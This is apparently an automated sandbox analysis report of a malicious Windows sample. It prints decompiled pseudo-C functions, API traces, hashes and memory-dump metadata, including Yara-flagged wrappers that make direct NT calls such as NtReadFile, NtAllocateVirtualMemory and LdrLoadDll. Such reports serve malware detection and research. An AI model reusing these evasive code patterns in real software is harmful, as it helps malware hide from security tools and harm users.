                                                                  • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                                                  • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                  • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405513(char* _a4) {
                                                                  				char* _t3;
                                                                  				char* _t4;
                                                                  
                                                                  				_t4 = _a4;
                                                                  				_t3 =  &(_t4[lstrlenA(_t4)]);
                                                                  				while( *_t3 != 0x5c) {
                                                                  					_t3 = CharPrevA(_t4, _t3);
                                                                  					if(_t3 > _t4) {
                                                                  						continue;
                                                                  					}
                                                                  					break;
                                                                  				}
                                                                  				 *_t3 =  *_t3 & 0x00000000;
                                                                  				return _t3;
                                                                  			}





                                                                  0x00405514
                                                                  0x0040551e
                                                                  0x00405520
                                                                  0x00405527
                                                                  0x0040552f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040552f
                                                                  0x00405531
                                                                  0x00405535

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: CharPrevlstrlen
                                                                  • String ID: C:\Users\user\Desktop
                                                                  • API String ID: 2709904686-3125694417
                                                                  • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                  • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                                                  • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                  • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00405624(CHAR* _a4, CHAR* _a8) {
                                                                  				int _t10;
                                                                  				int _t15;
                                                                  				CHAR* _t16;
                                                                  
                                                                  				_t15 = lstrlenA(_a8);
                                                                  				_t16 = _a4;
                                                                  				while(lstrlenA(_t16) >= _t15) {
                                                                  					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                  					_t10 = lstrcmpiA(_t16, _a8);
                                                                  					if(_t10 == 0) {
                                                                  						return _t16;
                                                                  					}
                                                                  					_t16 = CharNextA(_t16);
                                                                  				}
                                                                  				return 0;
                                                                  			}






                                                                  0x00405630
                                                                  0x00405632
                                                                  0x0040565a
                                                                  0x0040563f
                                                                  0x00405644
                                                                  0x0040564f
                                                                  0x00000000
                                                                  0x0040566c
                                                                  0x00405658
                                                                  0x00405658
                                                                  0x00000000

                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                                                  • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.341255397.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.341251648.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341261912.0000000000407000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341265971.0000000000409000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341293611.000000000077A000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341297816.0000000000784000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341301193.0000000000788000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341309526.0000000000795000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341328641.00000000007A1000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341332601.00000000007A9000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000001.00000002.341336994.00000000007AC000.00000002.00020000.sdmp Download File
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                  • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                                                  • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                  • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Executed Functions

                                                                  C-Code - Quality: 37%
                                                                  			E0041827A(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                  				void* _t21;
                                                                  				void* _t30;
                                                                  				void* _t31;
                                                                  				intOrPtr* _t32;
                                                                  				void* _t34;
                                                                  
                                                                  				_t16 = _a4;
                                                                  				_t32 = _a4 + 0xc48;
                                                                  				E00418DD0(_t30, _t16, _t32,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
                                                                  				_t4 =  &_a40; // 0x413a21
                                                                  				_t6 =  &_a32; // 0x413d62
                                                                  				_t12 =  &_a8; // 0x413d62
                                                                  				_t21 =  *((intOrPtr*)( *_t32))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4, _t31, _t34); // executed
                                                                  				return _t21;
                                                                  			}








                                                                  0x00418283
                                                                  0x0041828f
                                                                  0x00418297
                                                                  0x0041829c
                                                                  0x004182a2
                                                                  0x004182bd
                                                                  0x004182c5
                                                                  0x004182c9

                                                                  APIs
                                                                  • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID: !:A$b=A$b=A
                                                                  • API String ID: 2738559852-704622139
                                                                  • Opcode ID: 60a835ff09ef11b6ac704c61a5b4fa20c8bc6afb7646bcc013fe75f4bdf988a6
                                                                  • Instruction ID: b5615754761658bd711441828e4b352bd03c7bd528c04b5b19be2e0cc49a193e
                                                                  • Opcode Fuzzy Hash: 60a835ff09ef11b6ac704c61a5b4fa20c8bc6afb7646bcc013fe75f4bdf988a6
                                                                  • Instruction Fuzzy Hash: 52F0F4B2200208ABCB04DF99DC81EEB77A9EF8C754F018649BA1D97241DA30ED11CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 37%
                                                                  			E00418280(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                                  				void* _t18;
                                                                  				void* _t27;
                                                                  				intOrPtr* _t28;
                                                                  
                                                                  				_t13 = _a4;
                                                                  				_t28 = _a4 + 0xc48;
                                                                  				E00418DD0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                  				_t4 =  &_a40; // 0x413a21
                                                                  				_t6 =  &_a32; // 0x413d62
                                                                  				_t12 =  &_a8; // 0x413d62
                                                                  				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                                                  				return _t18;
                                                                  			}






                                                                  0x00418283
                                                                  0x0041828f
                                                                  0x00418297
                                                                  0x0041829c
                                                                  0x004182a2
                                                                  0x004182bd
                                                                  0x004182c5
                                                                  0x004182c9

                                                                  APIs
                                                                  • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID: !:A$b=A$b=A
                                                                  • API String ID: 2738559852-704622139
                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                  • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                  • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                  				char* _v8;
                                                                  				struct _EXCEPTION_RECORD _v12;
                                                                  				struct _OBJDIR_INFORMATION _v16;
                                                                  				char _v536;
                                                                  				void* _t15;
                                                                  				struct _OBJDIR_INFORMATION _t17;
                                                                  				struct _OBJDIR_INFORMATION _t18;
                                                                  				void* _t30;
                                                                  				void* _t31;
                                                                  				void* _t32;
                                                                  
                                                                  				_v8 =  &_v536;
                                                                  				_t15 = E0041AB60( &_v12, 0x104, _a8);
                                                                  				_t31 = _t30 + 0xc;
                                                                  				if(_t15 != 0) {
                                                                  					_t17 = E0041AF80(__eflags, _v8);
                                                                  					_t32 = _t31 + 4;
                                                                  					__eflags = _t17;
                                                                  					if(_t17 != 0) {
                                                                  						E0041B200( &_v12, 0);
                                                                  						_t32 = _t32 + 8;
                                                                  					}
                                                                  					_t18 = E00419310(_v8);
                                                                  					_v16 = _t18;
                                                                  					__eflags = _t18;
                                                                  					if(_t18 == 0) {
                                                                  						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                  						return _v16;
                                                                  					}
                                                                  					return _t18;
                                                                  				} else {
                                                                  					return _t15;
                                                                  				}
                                                                  			}













                                                                  0x00409b4c
                                                                  0x00409b4f
                                                                  0x00409b54
                                                                  0x00409b59
                                                                  0x00409b63
                                                                  0x00409b68
                                                                  0x00409b6b
                                                                  0x00409b6d
                                                                  0x00409b75
                                                                  0x00409b7a
                                                                  0x00409b7a
                                                                  0x00409b81
                                                                  0x00409b89
                                                                  0x00409b8c
                                                                  0x00409b8e
                                                                  0x00409ba2
                                                                  0x00000000
                                                                  0x00409ba4
                                                                  0x00409baa
                                                                  0x00409b5e
                                                                  0x00409b5e
                                                                  0x00409b5e

                                                                  APIs
                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Load
                                                                  • String ID:
                                                                  • API String ID: 2234796835-0
                                                                  • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                  • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                  • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                  • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                  				long _t21;
                                                                  				void* _t31;
                                                                  
                                                                  				_t3 = _a4 + 0xc40; // 0xc40
                                                                  				E00418DD0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                  				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                  				return _t21;
                                                                  			}





                                                                  0x004181df
                                                                  0x004181e7
                                                                  0x0041821d
                                                                  0x00418221

                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                  • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                  • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 79%
                                                                  			E004183AA(void* __ebx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                  				long _t14;
                                                                  				void* _t25;
                                                                  
                                                                  				asm("in al, 0x55");
                                                                  				_t10 = _a4;
                                                                  				_t3 = _t10 + 0xc60; // 0xca0
                                                                  				E00418DD0(_t25, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                  				return _t14;
                                                                  			}





                                                                  0x004183ac
                                                                  0x004183b3
                                                                  0x004183bf
                                                                  0x004183c7
                                                                  0x004183e9
                                                                  0x004183ed

                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: 48514db8a9243e84ff01d23d689cadf75fe3c1ea32e061657586986da4c40688
                                                                  • Instruction ID: 4cfd2d53dddc61e9514ec21e9fd26517676d799b5ca20f99468bba50249d0662
                                                                  • Opcode Fuzzy Hash: 48514db8a9243e84ff01d23d689cadf75fe3c1ea32e061657586986da4c40688
                                                                  • Instruction Fuzzy Hash: F2F039B5214149ABCB14DF99EC84CE7B7A9FF88354B15874EFD4C97202C634E855CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004183B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                  				long _t14;
                                                                  				void* _t21;
                                                                  
                                                                  				_t3 = _a4 + 0xc60; // 0xca0
                                                                  				E00418DD0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                  				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                  				return _t14;
                                                                  			}





                                                                  0x004183bf
                                                                  0x004183c7
                                                                  0x004183e9
                                                                  0x004183ed

                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                  • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                  • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00418300(intOrPtr _a4, void* _a8) {
                                                                  				long _t8;
                                                                  				void* _t11;
                                                                  
                                                                  				_t5 = _a4;
                                                                  				_t2 = _t5 + 0x10; // 0x300
                                                                  				_t3 = _t5 + 0xc50; // 0x409753
                                                                  				E00418DD0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                                  				_t8 = NtClose(_a8); // executed
                                                                  				return _t8;
                                                                  			}





                                                                  0x00418303
                                                                  0x00418306
                                                                  0x0041830f
                                                                  0x00418317
                                                                  0x00418325
                                                                  0x00418329

                                                                  APIs
                                                                  • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                  • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                  • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 063c528f82b1d001d0cb6d01bdc4c0f72764b0d2ff84c3e308f1a1df356ac1a8
                                                                  • Instruction ID: d64984979b305ccb5e35b35acd27a0667bc32fad1515e89ea6ca52b66f6c8e22
                                                                  • Opcode Fuzzy Hash: 063c528f82b1d001d0cb6d01bdc4c0f72764b0d2ff84c3e308f1a1df356ac1a8
                                                                  • Instruction Fuzzy Hash: FC90026260101502D20171595404616004AD7D0391FA1C076A5054555ECA6589A3F171
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 4489c2ca7f14808274956fbbc9963faa1670cd6d7d3470695136c8ab4354a0ad
                                                                  • Instruction ID: fc8cc9ee8be9c98fb4dd9e738ee057c4202b2c6b9eced3574650befb9a06e9f7
                                                                  • Opcode Fuzzy Hash: 4489c2ca7f14808274956fbbc9963faa1670cd6d7d3470695136c8ab4354a0ad
                                                                  • Instruction Fuzzy Hash: 6190027220101413D211615955047070049D7D0391FA1C466A4454558D96968963F161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: a87bd7f3a249d6cfde7da98910aacc96d232c7ddbad664543b5fbc6e06de1c4f
                                                                  • Instruction ID: 95f6909961eea0f216a17a31d6ae4d59bea172290c0c8aafaae842ca9f112f4a
                                                                  • Opcode Fuzzy Hash: a87bd7f3a249d6cfde7da98910aacc96d232c7ddbad664543b5fbc6e06de1c4f
                                                                  • Instruction Fuzzy Hash: AC900262242051525645B15954045074046E7E03917A1C066A5444950C85669867E661
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 89531899f8a4ac8a9ece141cc46f2db1eb4985ad4b455c023ff5d29ab6bed80f
                                                                  • Instruction ID: 71b7c938c8e762d9706efb7f0032ee7508be3a1204aea600cfc989511619690f
                                                                  • Opcode Fuzzy Hash: 89531899f8a4ac8a9ece141cc46f2db1eb4985ad4b455c023ff5d29ab6bed80f
                                                                  • Instruction Fuzzy Hash: 2E9002A234101442D20061595414B060045D7E1351F61C069E5094554D8659CC63B166
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 14799cad8b0f07284370b739a907d95a04f0e011f1aab40300d877f79d1bb079
                                                                  • Instruction ID: 1a481d107f49ac290c7faa8630299d9132cfc41bee699d5ec2a46ee19c353434
                                                                  • Opcode Fuzzy Hash: 14799cad8b0f07284370b739a907d95a04f0e011f1aab40300d877f79d1bb079
                                                                  • Instruction Fuzzy Hash: 879002A220201003420571595414616404AD7E0351B61C075E5044590DC56588A2B165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: fa58dfa02bf966abbb3b3759d09f71554276a3d158b91a5e49dd339763a3e8af
                                                                  • Instruction ID: 0bd72bcddb3dff370e960f814bb3b6dd2ede98572626d47e6cc89be2df15eed3
                                                                  • Opcode Fuzzy Hash: fa58dfa02bf966abbb3b3759d09f71554276a3d158b91a5e49dd339763a3e8af
                                                                  • Instruction Fuzzy Hash: DE9002B220101402D240715954047460045D7D0351F61C065A9094554E86998DE6B6A5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3e80138d8b5ece78482768db8b5e55c350639e996ac3796d57c51564e5715ceb
                                                                  • Instruction ID: c971a314c98f143b00dd96568ed88d3344b1584f747b0b17e502198f438016a4
                                                                  • Opcode Fuzzy Hash: 3e80138d8b5ece78482768db8b5e55c350639e996ac3796d57c51564e5715ceb
                                                                  • Instruction Fuzzy Hash: 9E900266211010030205A55917045070086D7D53A1361C075F5045550CD6618872A161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 4a4d7d0a2e80a333107573396a1033c49ced439b8cc9b6aa5c91f9ad5764e643
                                                                  • Instruction ID: cb6cbbc6d1471cc5f359a6ad98460fe7128d69dfddb69a2659d68c357978ac6a
                                                                  • Opcode Fuzzy Hash: 4a4d7d0a2e80a333107573396a1033c49ced439b8cc9b6aa5c91f9ad5764e643
                                                                  • Instruction Fuzzy Hash: F190027220109802D2106159940474A0045D7D0351F65C465A8454658D86D588A2B161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 9e83950b46826a34b4ca013e3159298a87cd56ab1115622e9cdc6fd77e368c02
                                                                  • Instruction ID: bf6746e31020169648be33c61ae90c02cacae2c90904c8f6487dd40e4f67ee1c
                                                                  • Opcode Fuzzy Hash: 9e83950b46826a34b4ca013e3159298a87cd56ab1115622e9cdc6fd77e368c02
                                                                  • Instruction Fuzzy Hash: 35900262601010424240716998449064045FBE1361761C175A49C8550D85998876A6A5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3d03f7c547199f99c02c7dee017407456afe7b34bec77374484adaf8b2866613
                                                                  • Instruction ID: 7f15fa59ff672cabf126af0337b88c62a59e9ca56a2d1198431690febca14208
                                                                  • Opcode Fuzzy Hash: 3d03f7c547199f99c02c7dee017407456afe7b34bec77374484adaf8b2866613
                                                                  • Instruction Fuzzy Hash: 3B90027220141402D2006159581470B0045D7D0352F61C065A5194555D86658862B5B1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 96d8a5747d9d81362ba1cdf758f5da86a6fd4160afb6ff4e805053ee72cd80ef
                                                                  • Instruction ID: b6af3f1361b8eda67e540867a7bd53bdb9143e8686efc2481cc801b9ac8b9ecb
                                                                  • Opcode Fuzzy Hash: 96d8a5747d9d81362ba1cdf758f5da86a6fd4160afb6ff4e805053ee72cd80ef
                                                                  • Instruction Fuzzy Hash: B490027220101802D2807159540464A0045D7D1351FA1C069A4055654DCA558A6AB7E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
